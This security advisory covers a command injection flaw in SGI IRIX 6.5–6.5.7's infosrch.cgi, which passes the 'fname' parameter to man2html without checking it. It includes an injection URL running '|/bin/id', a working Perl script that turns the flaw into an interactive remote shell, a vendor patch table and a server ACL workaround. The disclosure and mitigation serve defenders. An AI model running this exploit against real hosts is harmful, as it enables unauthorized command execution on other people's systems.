COMMAND
infosrch.cgi
SYSTEMS AFFECTED
IRIX 6.5-6.5.7
PROBLEM
'jared' found following. InfoSearch is a web-based interface to
books, manpages, and relnotes, distributed by SGI. No suprises
here, no parsing is done on the 'fname' variable before being
passed to man2html. (i.e. when cmd is 'getdoc' and db is 'man').
Also, fname is the _full path_ to the manpage/relnote! There's
could be more vulnerabilities lurking about in this script.
Example:
http://my.really.expensive.sgi.box/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id
According to 'rpc', SGI's security advisory regarding infosrch.cgi
minimizes the actual vulnerability. Not only does it allow you to
view any file on the system, an attacker can easily run arbitrary
commands. Below is a simple perl script that demonstrates this.
#!/usr/bin/perl -w
# infosearch.cgi interactive shell.
# usage: ./infosh.pl hostname
# 3/4/00
# --rpc <h@ckz.org>
use IO::Socket;
use CGI ":escape";
$|++;
die "usage: $0 host\n" unless(@ARGV == 1);
($host) = shift @ARGV;
$cgi = "/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|";
# url encode and send a command.
sub send_cmd
{
my($url_command) = $cgi . CGI::escape(shift);
$s = IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>80,Proto=>"tcp");
if(!$s) { die "denied.\n"; }
print $s "GET $url_command HTTP/1.0\r\n";
print $s "User-Agent: \r\n\r\n";
@result = <$s>;
shift @result until $result[0] =~ /^\r\n/; # uninteresting data.
shift @result; $#result--;
return @result;
}
# draw a pseudo prompt. i like "\h:\w \$ ".
sub prompt
{
@res = send_cmd("/sbin/pwd");
chomp($pwd = $res[0]);
print "$host:", $pwd, "\$ ";
}
prompt;
while(!eof(STDIN)) {
chomp($cmd = <STDIN>);
print send_cmd($cmd);
prompt;
}
SOLUTION
SGI has investigated the issue and recommends the following steps
for neutralizing the exposure. It is HIGHLY RECOMMENDED that
these measures be implemented on ALL vulnerable SGI systems.
This issue has been corrected in future releases of IRIX.
OS Version Vulnerable? Patch # Other Actions
---------- ----------- ------- -------------
IRIX 3.x not tested Note 1
IRIX 4.x not tested Note 1
IRIX 5.X not tested Note 1
IRIX 6.0.x-6.1 not tested Note 1
IRIX 6.2 no Note 2
IRIX 6.3-6.4 not tested Note 1
IRIX 6.5-6.5.7 yes 6.5.8 Note 3 & 4
IRIX 6.5.8 no Note 4
Note 1) This version of the IRIX operating has been retired.
Upgrade to an actively supported IRIX operating system.
See http://support.sgi.com/irix/news/index.html#policy for
more information.
Note 2) This version of the IRIX operating system is in
maintenance mode. Upgrade to an actively supported IRIX
operating system. See
http://support.sgi.com/irix/news/index.html#policy for
more information.
Note 3) See "Temporary Solution" section.
Note 4) If you have not received the IRIX 6.5.8 CDs for IRIX 6.5,
contact your SGI Support Provider or download the IRIX
6.5.8 Maintenance Release Stream.
It's surprising that SGI doesn't mention the Netscape server ACLs
that you can use to prevent this. Given that most SGI's out there
using the online manpages are *workstations* this is a safe fix.
Note that the ACLs will disable anyone else from getting to the
web server and associated materials. (But hey, if you're using an
SGI/IRIX webserver without securing it, you deserve what you get).
By default, the server software lives in /usr/ns-home. We can use
the ACLs built into the server solution. Simply edit your
magnus.conf file (and replace workstation with the system's name)
and add the following line:
file /usr/ns-home/httpd-workstation/config/magnus.conf:
ACLFile /usr/ns-home/httpacl/generated.httpd-workstation.acl
Then create or edit the file as needed (note the \ to point out
the line wrap, it's all one line in the file). Change
"workstayion" to your system's name and 10.1.2.3 to your system's
IP address:
file: /usr/ns-home/httpacl/generated.httpd-workstation.acl:
ACL httpd-workstation_formgen-WRITE-ACL_deny-3633 (PUT, DELETE, MKDIR, \
RMDIR, MOVE) {
Default deny anyone;
}
ACL httpd-workstation_formgen-READ-ACL_allow-3633 (GET, HEAD, POST, INDEX)
{
Default deny anyone;
Default allow anyone at (127.0.0.1, 10.1.2.3);